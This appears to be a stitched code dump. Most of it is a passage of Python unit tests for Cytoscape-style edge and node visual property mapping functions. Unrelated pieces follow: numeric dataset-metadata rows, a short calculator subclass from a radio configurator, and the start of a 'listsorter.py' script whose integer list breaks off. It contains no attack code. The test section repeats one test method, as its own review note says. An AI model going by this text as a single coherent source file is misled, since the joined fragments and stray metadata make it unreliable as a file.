def test_set_edge_font_face_mapping(self):
    """Exercise set_edge_font_face_mapping; continuous mapping is unsupported for fonts."""
    new_default = 'Dialog.bold,bold,12'
    self._check_set_edge_property({
        'prop_func': set_edge_font_face_mapping,
        'prop_name': 'EDGE_LABEL_FONT_FACE',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 'Dialog.italic,plain,12',
        # Fonts can't be continuously interpolated, so 'c' must raise instead.
        'cont_no_map_params': {'mapping_type': 'c'},
        'disc_test_params': {'fonts': ['Arial,plain,12', 'Arial Bold,bold,12'],
                             'mapping_type': 'd'},
        'pass_test_params': {'default_font': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_font_size_mapping(self):
    """Exercise set_edge_font_size_mapping for continuous, discrete and passthru mappings."""
    new_default = 20
    self._check_set_edge_property({
        'prop_func': set_edge_font_size_mapping,
        'prop_name': 'EDGE_LABEL_FONT_SIZE',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 40,
        'cont_test_params': {'sizes': [20, 80]},
        'cont_short_map_params': {'sizes': [20]},
        'disc_test_params': {'sizes': [40, 90], 'mapping_type': 'd'},
        'pass_test_params': {'default_size': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_label_mapping(self):
    """Exercise set_edge_label_mapping; labels support only a passthru mapping."""
    self._check_set_edge_property({
        'prop_func': set_edge_label_mapping,
        'prop_name': 'EDGE_LABEL',
        'passthru_val': 'name',
        'pass_test_params': {},
        'exception_check_params': {},
    })
@print_entry_exit
def test_set_edge_label_color_mapping(self):
    """Exercise set_edge_label_color_mapping for continuous, discrete and passthru mappings."""
    new_default = '#654321'
    self._check_set_edge_property({
        'prop_func': set_edge_label_color_mapping,
        'prop_name': 'EDGE_LABEL_COLOR',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': '#123456',
        'cont_test_params': {'colors': ['#FBE723', '#440256']},
        'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},  # malformed hex color
        'cont_short_map_params': {'colors': ['#440256']},
        'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
        'pass_test_params': {'default_color': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_label_opacity_mapping(self):
    """Exercise set_edge_label_opacity_mapping for continuous, discrete and passthru mappings."""
    new_default = 225
    self._check_set_edge_property({
        'prop_func': set_edge_label_opacity_mapping,
        'prop_name': 'EDGE_LABEL_TRANSPARENCY',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 250,
        'cont_test_params': {'opacities': [50, 100]},
        'cont_bad_map_params': {'opacities': [550, 100]},  # 550 is out of the 0..255 range
        'cont_short_map_params': {'opacities': [50]},
        'disc_test_params': {'opacities': [150, 200], 'mapping_type': 'd'},
        'pass_test_params': {'default_opacity': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_line_style_mapping(self):
    """Exercise set_edge_line_style_mapping; line styles support only a discrete mapping."""
    new_default = 'EQUAL_DASH'
    self._check_set_edge_property({
        'prop_func': set_edge_line_style_mapping,
        'prop_name': 'EDGE_LINE_TYPE',
        'new_default': new_default,
        'set_default': 'd',
        'disc_test_params': {'line_styles': ['ZIGZAG', 'SINEWAVE'],
                             'default_line_style': new_default},
        'exception_check_params': {},
    })
@print_entry_exit
def test_set_edge_line_width_mapping(self):
    """Exercise set_edge_line_width_mapping for continuous, discrete and passthru mappings."""
    new_default = 20
    # No bounds checking exists for this property, so no cont_bad_map_params case.
    self._check_set_edge_property({
        'prop_func': set_edge_line_width_mapping,
        'prop_name': 'EDGE_WIDTH',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 40,
        'cont_test_params': {'widths': [5, 10]},
        'cont_short_map_params': {'widths': [5]},
        'disc_test_params': {'widths': [5, 10], 'mapping_type': 'd'},
        'pass_test_params': {'default_width': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_opacity_mapping(self):
    """Exercise set_edge_opacity_mapping for continuous, discrete and passthru mappings."""
    new_default = 225
    self._check_set_edge_property({
        'prop_func': set_edge_opacity_mapping,
        'prop_name': 'EDGE_TRANSPARENCY',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 250,
        'cont_test_params': {'opacities': [50, 100]},
        'cont_bad_map_params': {'opacities': [550, 100]},  # 550 is out of the 0..255 range
        'cont_short_map_params': {'opacities': [50]},
        'disc_test_params': {'opacities': [75, 100], 'mapping_type': 'd'},
        'pass_test_params': {'default_opacity': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_target_arrow_mapping(self):
    """Exercise set_edge_target_arrow_maping; arrow shapes support only a discrete mapping."""
    # NOTE(review): 'maping' (single 'p') appears to be the library's actual
    # exported name -- confirm against the package before "correcting" it here.
    new_default = 'CIRCLE'
    self._check_set_edge_property({
        'prop_func': set_edge_target_arrow_maping,
        'prop_name': 'EDGE_TARGET_ARROW_SHAPE',
        'new_default': new_default,
        'set_default': 'd',
        'disc_test_params': {'shapes': ['DIAMOND', 'CIRCLE'],
                             'default_shape': new_default},
        'exception_check_params': {},
    })
@print_entry_exit
def test_set_edge_source_arrow_mapping(self):
    """Exercise set_edge_source_arrow_mapping; arrow shapes support only a discrete mapping."""
    new_default = 'CIRCLE'
    self._check_set_edge_property({
        'prop_func': set_edge_source_arrow_mapping,
        'prop_name': 'EDGE_SOURCE_ARROW_SHAPE',
        'new_default': new_default,
        'set_default': 'd',
        'disc_test_params': {'shapes': ['DIAMOND', 'CIRCLE'],
                             'default_shape': new_default},
        'exception_check_params': {},
    })
@print_entry_exit
def test_set_edge_target_arrow_color_mapping(self):
    """Exercise set_edge_target_arrow_color_mapping for continuous, discrete and passthru mappings."""
    new_default = '#654321'
    self._check_set_edge_property({
        'prop_func': set_edge_target_arrow_color_mapping,
        'prop_name': 'EDGE_TARGET_ARROW_UNSELECTED_PAINT',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': '#123456',
        'cont_test_params': {'colors': ['#FBE723', '#440256']},
        'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},  # malformed hex color
        'cont_short_map_params': {'colors': ['#440256']},
        'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
        'pass_test_params': {'default_color': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_source_arrow_color_mapping(self):
    """Exercise set_edge_source_arrow_color_mapping for continuous, discrete and passthru mappings."""
    new_default = '#654321'
    self._check_set_edge_property({
        'prop_func': set_edge_source_arrow_color_mapping,
        'prop_name': 'EDGE_SOURCE_ARROW_UNSELECTED_PAINT',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': '#123456',
        'cont_test_params': {'colors': ['#FBE723', '#440256']},
        'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},  # malformed hex color
        'cont_short_map_params': {'colors': ['#440256']},
        'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
        'pass_test_params': {'default_color': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_target_arrow_color_mapping(self):
    """Exercise set_edge_target_arrow_color_mapping for continuous, discrete and passthru mappings."""
    # NOTE(review): this is a byte-identical duplicate of the
    # test_set_edge_target_arrow_color_mapping defined earlier in this class;
    # Python silently lets this later definition shadow the earlier one, so
    # only one of the two ever runs -- consider deleting one copy.
    new_default = '#654321'
    self._check_set_edge_property({
        'prop_func': set_edge_target_arrow_color_mapping,
        'prop_name': 'EDGE_TARGET_ARROW_UNSELECTED_PAINT',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': '#123456',
        'cont_test_params': {'colors': ['#FBE723', '#440256']},
        'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},  # malformed hex color
        'cont_short_map_params': {'colors': ['#440256']},
        'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
        'pass_test_params': {'default_color': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_edge_tooltip_mapping(self):
    """Exercise set_edge_tooltip_mapping; tooltips support only a passthru mapping."""
    # TODO: This fails because of a race condition when reading the tooltip immediately after setting it
    self._check_set_edge_property({
        'prop_func': set_edge_tooltip_mapping,
        'prop_name': 'EDGE_TOOLTIP',
        'passthru_val': 'tooltip text',
        'pass_test_params': {},
        'exception_check_params': {},
    })
@print_entry_exit
def test_set_edge_target_arrow_shape_mapping(self):
    """Exercise set_edge_target_arrow_shape_mapping; arrow shapes support only a discrete mapping."""
    new_default = 'CIRCLE'
    self._check_set_edge_property({
        'prop_func': set_edge_target_arrow_shape_mapping,
        'prop_name': 'EDGE_TARGET_ARROW_SHAPE',
        'new_default': new_default,
        'set_default': 'd',
        'disc_test_params': {'shapes': ['DIAMOND', 'CIRCLE'],
                             'default_shape': new_default},
        'exception_check_params': {},
    })
@print_entry_exit
def test_set_edge_source_arrow_shape_mapping(self):
    """Exercise set_edge_source_arrow_shape_mapping; arrow shapes support only a discrete mapping."""
    new_default = 'CIRCLE'
    self._check_set_edge_property({
        'prop_func': set_edge_source_arrow_shape_mapping,
        'prop_name': 'EDGE_SOURCE_ARROW_SHAPE',
        'new_default': new_default,
        'set_default': 'd',
        'disc_test_params': {'shapes': ['DIAMOND', 'CIRCLE'],
                             'default_shape': new_default},
        'exception_check_params': {},
    })
# Verify that current and default versions of visual property for a node can be set, and that the expected
# errors are returned
#
# For explanation of 'profile' parameter, see _check_node_set_property()
#
def _check_set_edge_property(self, profile):
    """Verify that current and default values of an edge visual property can be set,
    and that the expected errors are returned.

    ``profile`` is the same test-driver dict documented ahead of
    _check_set_node_property (prop_func, prop_name, new_default, set_default,
    passthru_val, *_test_params, *_no_map_params, etc.).
    """
    # Initialization
    load_test_session()
    _TEST_EDGE = 'YER110C (pp) YML007W'
    _NOT_TEST_EDGE = 'YPR113W (pd) YMR043W'
    _TEST_STYLE = 'galFiltered Style'
    _CONT_COL = 'EdgeBetweenness'  # Guaranteed to exist
    _CONT_VAL_RANGE = [2.0, 20000.00]
    _DESC_COL = 'interaction'  # Guaranteed to exist
    _DESC_VAL_RANGE = ['pp', 'px']
    _PASS_COL = 'PassthruCol'  # Created for passthru test
    prop_func = profile['prop_func']
    prop_name_list = profile['prop_name'] if isinstance(profile['prop_name'], list) else [profile['prop_name']]
    orig_value_list = [get_edge_property(edge_names=[_TEST_EDGE], visual_property=prop_name)[_TEST_EDGE]
                       for prop_name in prop_name_list]

    def check_default():
        # Probe an edge outside the mapped test data so we see the style default.
        def_value_list = [get_edge_property(visual_property=prop_name)[_NOT_TEST_EDGE] for prop_name in
                          prop_name_list]
        for def_value in def_value_list:
            self._assert_equal(profile, def_value, profile['new_default'], msg='Check edge property equals default')

    # Verify that applying a continuous mapping functions
    if 'cont_test_params' in profile:
        self.assertEqual(
            prop_func(style_name=_TEST_STYLE, table_column=_CONT_COL, table_column_values=_CONT_VAL_RANGE,
                      **profile['cont_test_params']), '', msg='Check continuous mapping succeeded')
        cont_value_list = [get_edge_property(visual_property=prop_name)[_TEST_EDGE] for prop_name in prop_name_list]
        for cont_value, orig_value in zip(cont_value_list, orig_value_list):
            self.assertNotEqual(cont_value, orig_value,
                                msg='Check continuous mapping not equal to original mapping')
        if 'set_default' in profile and profile['set_default'] == 'c': check_default()
    else:
        cont_value_list = []  # so the discrete-vs-continuous comparison below is a no-op
        if 'cont_no_map_params' in profile:
            self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
                              **profile['cont_no_map_params'])

    # Verify that applying a discrete mapping functions
    if 'disc_test_params' in profile:
        self.assertEqual(
            prop_func(style_name=_TEST_STYLE, table_column=_DESC_COL, table_column_values=_DESC_VAL_RANGE,
                      **profile['disc_test_params']), '', msg='Check discrete mapping succeeded')
        disc_value_list = [get_edge_property(visual_property=prop_name)[_TEST_EDGE] for prop_name in prop_name_list]
        for disc_value, orig_value in zip(disc_value_list, orig_value_list):
            self.assertNotEqual(disc_value, orig_value, msg='Check discrete mapping not equal to original mapping')
        for disc_value, cont_value in zip(disc_value_list, cont_value_list):
            self.assertNotEqual(disc_value, cont_value,
                                msg='Check discrete mapping not equal to continuous mapping')
        if 'set_default' in profile and profile['set_default'] == 'd': check_default()
    elif 'disc_no_map_params' in profile:
        self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_DESC_COL,
                          **profile['disc_no_map_params'])

    # Create a column containing values, then verify that a passthru mapping causes a new value and new default value
    if 'pass_test_params' in profile:
        data = df.DataFrame(data={'id': [_TEST_EDGE], _PASS_COL: [profile['passthru_val']]})
        load_table_data(data, data_key_column='id', table='edge', table_key_column='name')
        self.assertEqual(prop_func(style_name=_TEST_STYLE, table_column=_PASS_COL, **profile['pass_test_params']),
                         '', msg='Check passthru mapping succeeded')
        pass_value_list = [get_edge_property(visual_property=prop_name)[_TEST_EDGE] for prop_name in prop_name_list]
        for pass_value in pass_value_list:
            # Message fixed: this is the edge checker (was 'node' via copy/paste).
            self.assertEqual(pass_value, profile['passthru_val'], msg='Check edge property equals passthru mapping')
        if 'set_default' in profile and profile['set_default'] == 'p': check_default()
    elif 'pass_no_map_params' in profile:
        self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
                          **profile['pass_no_map_params'])

    # Verify that a bad value is caught
    if 'cont_bad_map_params' in profile:
        self.assertRaises(CyError,
                          prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
                          table_column_values=_CONT_VAL_RANGE,
                          **profile['cont_bad_map_params'])

    # Verify that a bad mapping type is caught
    if 'invalid_map_params' in profile:
        self.assertRaises(CyError,
                          prop_func, style_name=_TEST_STYLE, table_column=_PASS_COL,
                          **profile['invalid_map_params'])

    # Verify that a bad column name is caught
    self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column='Bogus Col',
                      **profile['exception_check_params'])

    # Verify that a bad style name is caught
    self.assertRaises(CyError, prop_func, style_name='Bogus Style', table_column=_PASS_COL,
                      **profile['exception_check_params'])

    # Verify that a short mapping (fewer values than table_column_values) is caught
    if 'cont_short_map_params' in profile:
        self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
                          table_column_values=_CONT_VAL_RANGE, **profile['cont_short_map_params'])

    # Verify that a bad network is caught
    self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_PASS_COL,
                      **profile['exception_check_params'], network='bogus network')
# Verify that current and default versions of visual property for a node can be set, and that the expected
# errors are returned
#
# profile is a dict that drives the test. Field values:
# {
# 'prop_func': name of function that sets node visual property
# 'prop_name': name of visual property to set
# 'new_default': value to set as new default ... type matches visual property
# 'set_default': type of mapping to use for testing that default is set properly (e.g., 'c', 'd', or 'p)
# 'passthru_val': for a passthru mapping, the value to put into the passthru column ... type matches property
# 'compare_tolerance_percent': for numeric properties that Cytoscape calculates,
# tolerance for Cytoscape's value matching expected 'new_default'
# 'cont_test_params': parameter to pass for a 'c' mapping when 'c' is available ... usually includes the range
# of mapped values. e.g., {'colors': ['#FBE723', '#440256']}
# 'cont_no_map_params': parameter to pass for verifying that 'c' is unavailable and trying to map 'c' should
# result in an error. e.g., {'mapping_type': 'c'}
# 'cont_bad_map_params': parameter to pass for verifying that parameter values are checked when 'c' is available.
# Should result in an error. e.g., {'colors': ['#FBE72', '#440256']},
# 'cont_short_map_params': parameter to pass for verifying that parameter values are checked when 'c' is available.
# Should result in an error. e.g., {'colors': ['#440256']} when two table_column_values are provided.
# 'disc_test_params': parameter to pass for a 'd' mapping when 'd' is available ... usually includes the list
# of mapped values. e.g., {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_no_map_params': parameter to pass for verifying that 'd' is unavailable and trying to map 'd' should
# result in an error. e.g., {'mapping_type': 'd'},
# 'pass_test_params': parameter to pass for a 'p' mapping when 'p' is available ... usually includes the default
# value when the default can be set. e.g., {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': parameter to pass for verifying that 'p' is unavailable and trying to map 'p' should
# result in an error. e.g., {'mapping_type': 'p'},
# 'invalid_map_params': parameter to pass to verify that an invalid mapping is caught. e.g., {'mapping_type': 'X'},
# 'exception_check_params': parameter to pass when checking for various kinds of exceptions. e.g., {'mapping_type': 'p'},
# }
    def _check_set_node_property(self, profile):
        """Exercise a set-node-property mapping function against the mapping types its profile declares.

        ``profile`` is a dict (documented in the comment block above) that names the
        function under test ('prop_func'), the visual property or properties it sets
        ('prop_name'), and the parameter sets to use for continuous ('c'), discrete
        ('d') and passthru ('p') mappings, plus the expected error cases.
        """
        # Initialization
        load_test_session()
        _TEST_NODE = 'YML007W'
        _NOT_TEST_NODE = 'YGL035C'
        _TEST_STYLE = 'galFiltered Style'
        _CONT_COL = 'AverageShortestPathLength'  # Guaranteed to exist
        _CONT_VAL_RANGE = [1.0, 16.36]
        _DESC_COL = 'Degree'  # Guaranteed to exist
        _DESC_VAL_RANGE = ['1', '2']
        _PASS_COL = 'PassthruCol'  # Created for passthru test
        prop_func = profile['prop_func']
        # 'prop_name' may be a single visual property name or a list of them; normalize to a list.
        prop_name_list = profile['prop_name'] if isinstance(profile['prop_name'], list) else [profile['prop_name']]
        # Capture each property's value on the test node before any mapping is applied,
        # so later mappings can be shown to have changed it.
        orig_value_list = [get_node_property(node_names=[_TEST_NODE], visual_property=prop_name)[_TEST_NODE]
                           for prop_name in prop_name_list]

        def check_default():
            # A node NOT named by the mapping data shows the style default, so read it there.
            def_value_list = [get_node_property(visual_property=prop_name)[_NOT_TEST_NODE] for prop_name in
                              prop_name_list]
            for def_value in def_value_list:
                self._assert_equal(profile, def_value, profile['new_default'], msg='Check node property equals default')

        # Verify that applying a continuous mapping functions
        if 'cont_test_params' in profile:
            self.assertEqual(
                prop_func(style_name=_TEST_STYLE, table_column=_CONT_COL, table_column_values=_CONT_VAL_RANGE,
                          **profile['cont_test_params']), '',
                msg='Check continuous mapping succeeded')
            cont_value_list = [get_node_property(visual_property=prop_name)[_TEST_NODE] for prop_name in prop_name_list]
            for cont_value, orig_value in zip(cont_value_list, orig_value_list):
                self.assertNotEqual(cont_value, orig_value,
                                    msg='Check continuous mapping not equal to original mapping')
            if 'set_default' in profile and profile['set_default'] == 'c': check_default()
        else:
            # No continuous support; remember that so the discrete check below can skip the comparison.
            cont_value_list = []
            if 'cont_no_map_params' in profile:
                self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
                                  **profile['cont_no_map_params'])
        # Verify that applying a discrete mapping functions
        if 'disc_test_params' in profile:
            self.assertEqual(
                prop_func(style_name=_TEST_STYLE, table_column=_DESC_COL, table_column_values=_DESC_VAL_RANGE,
                          **profile['disc_test_params']), '', msg='Check discrete mapping succeeded')
            disc_value_list = [get_node_property(visual_property=prop_name)[_TEST_NODE] for prop_name in prop_name_list]
            for disc_value, orig_value in zip(disc_value_list, orig_value_list):
                self.assertNotEqual(disc_value, orig_value, msg='Check discrete mapping not equal to original mapping')
            for disc_value, cont_value in zip(disc_value_list, cont_value_list):
                self.assertNotEqual(disc_value, cont_value,
                                    msg='Check discrete mapping not equal to continuous mapping')
            if 'set_default' in profile and profile['set_default'] == 'd': check_default()
        elif 'disc_no_map_params' in profile:
            self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_DESC_COL,
                              **profile['disc_no_map_params'])
        # Create a column containing values, then verify that a passthru mapping causes a new value and new default value
        if 'pass_test_params' in profile:
            data = df.DataFrame(data={'id': [_TEST_NODE], _PASS_COL: [profile['passthru_val']]})
            load_table_data(data, data_key_column='id', table='node', table_key_column='name')
            self.assertEqual(prop_func(style_name=_TEST_STYLE, table_column=_PASS_COL, **profile['pass_test_params']),
                             '',
                             msg='Check passthru mapping succeeded')
            pass_value_list = [get_node_property(visual_property=prop_name)[_TEST_NODE] for prop_name in prop_name_list]
            for pass_value in pass_value_list:
                self.assertEqual(pass_value, profile['passthru_val'], msg='Check node property equals passthru mapping')
            if 'set_default' in profile and profile['set_default'] == 'p': check_default()
        elif 'pass_no_map_params' in profile:
            # NOTE(review): this negative case passes _CONT_COL rather than _PASS_COL — presumably because
            # the passthru column is never created on this path; confirm that is intentional.
            self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
                              **profile['pass_no_map_params'])
        # Verify that a bad value is caught
        if 'cont_bad_map_params' in profile:
            self.assertRaises(CyError,
                              prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL, table_column_values=_CONT_VAL_RANGE,
                              **profile['cont_bad_map_params'])
        # Verify that a bad mapping type is caught
        if 'invalid_map_params' in profile:
            self.assertRaises(CyError,
                              prop_func, style_name=_TEST_STYLE, table_column=_PASS_COL, **profile['invalid_map_params'])
        # Verify that a bad column name is caught
        self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column='Bogus Col',
                          **profile['exception_check_params'])
        # Verify that a bad style name is caught
        self.assertRaises(CyError, prop_func, style_name='Bogus Style', table_column=_PASS_COL,
                          **profile['exception_check_params'])
        # Verify that a short mapping (fewer mapped values than table column values) is caught
        if 'cont_short_map_params' in profile:
            self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
                              table_column_values=_CONT_VAL_RANGE, **profile['cont_short_map_params'])
        # Verify that a bad network is caught
        self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_PASS_COL,
                          **profile['exception_check_params'], network='bogus network')
def _assert_equal(self, profile, def_value, expected_value, msg):
if 'compare_tolerance_percent' in profile:
tolerance = float(profile['compare_tolerance_percent']) / 100
self.assertGreaterEqual(def_value, expected_value * (1 - tolerance), msg=msg)
self.assertLessEqual(def_value, expected_value * (1 + tolerance), msg=msg)
else:
self.assertEqual(def_value, expected_value, msg=msg)
# Verify that a visual property map is constructed as expected.
def _check_property(self, cy_property, expected_property, expected_column, expected_column_type, expected_type,
expected_cargo=None):
self.assertIsInstance(cy_property, dict)
self.assertEqual(cy_property['mappingType'], expected_type)
self.assertEqual(cy_property['mappingColumn'], expected_column)
self.assertEqual(cy_property['mappingColumnType'], expected_column_type)
self.assertEqual(cy_property['visualProperty'], expected_property)
if expected_type == 'discrete':
self.assertIsInstance(cy_property['map'], type(expected_cargo))
self.assertListEqual(cy_property['map'], expected_cargo)
elif expected_type == 'continuous':
self.assertIsInstance(cy_property['points'], type(expected_cargo))
self.assertListEqual(cy_property['points'], expected_cargo)
else:
self.assertEqual(len(cy_property), 4) # passthrough or unknown
# Allow the test suite to be executed directly as a script.
if __name__ == '__main__':
    unittest.main()
| 65.698664
| 127
| 0.492917
| 7,417
| 78,707
| 4.802076
| 0.061211
| 0.057613
| 0.073982
| 0.074122
| 0.845972
| 0.814779
| 0.788668
| 0.757588
| 0.745515
| 0.7269
| 0
| 0.024353
| 0.397423
| 78,707
| 1,197
| 128
| 65.753551
| 0.726633
| 0.189475
| 0
| 0.667097
| 0
| 0
| 0.203503
| 0.03104
| 0
| 0
| 0
| 0.000835
| 0.082581
| 1
| 0.059355
| false
| 0.147097
| 0.006452
| 0
| 0.068387
| 0.049032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
9884d059c22b29622e6944ac95446d73c515923b
| 128
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/viper/calculators/calc_misc.py
|
SiliconLabs/Gecko_SDK
|
991121c706578c9a2135b6f75cc88856e8c64bdc
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/viper/calculators/calc_misc.py
|
SiliconLabs/Gecko_SDK
|
991121c706578c9a2135b6f75cc88856e8c64bdc
|
[
"Zlib"
] | 2
|
2017-02-13T10:07:17.000Z
|
2017-03-22T21:28:26.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/viper/calculators/calc_misc.py
|
SiliconLabs/Gecko_SDK
|
991121c706578c9a2135b6f75cc88856e8c64bdc
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.bobcat.calculators.calc_misc import Calc_Misc_Bobcat
class calc_misc_viper(Calc_Misc_Bobcat):
    """Misc calculator for the Viper part; inherits all behavior unchanged from the Bobcat implementation."""
    pass
| 32
| 77
| 0.859375
| 19
| 128
| 5.421053
| 0.578947
| 0.31068
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085938
| 128
| 4
| 78
| 32
| 0.880342
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
120ba2e0d76a29112470270e5cfdffd44d462f67
| 2,006
|
py
|
Python
|
Boardgame_Heatmap/listsorter.py
|
Kieran-Everett/pythonCode
|
9dbac87ef9043fb6391391df636ea8098c2b3d58
|
[
"MIT"
] | null | null | null |
Boardgame_Heatmap/listsorter.py
|
Kieran-Everett/pythonCode
|
9dbac87ef9043fb6391391df636ea8098c2b3d58
|
[
"MIT"
] | null | null | null |
Boardgame_Heatmap/listsorter.py
|
Kieran-Everett/pythonCode
|
9dbac87ef9043fb6391391df636ea8098c2b3d58
|
[
"MIT"
] | null | null | null |
from collections import Counter
# Raw observations collected for the board-game heatmap.
data = [2, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 30, 30, 30, 30, 30, 30, 30, 30, 30, 30, 30, 30, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 33, 33, 33, 33, 33, 33, 33, 33, 33, 34, 34, 34, 34, 34, 34, 34, 35, 35, 35, 35, 35, 35, 35, 35, 35, 36, 36, 36, 36, 36, 36, 36, 36, 37, 37, 37, 37, 37, 37, 38, 38, 38, 38, 38, 38, 38, 38, 39, 39, 39, 39, 39, 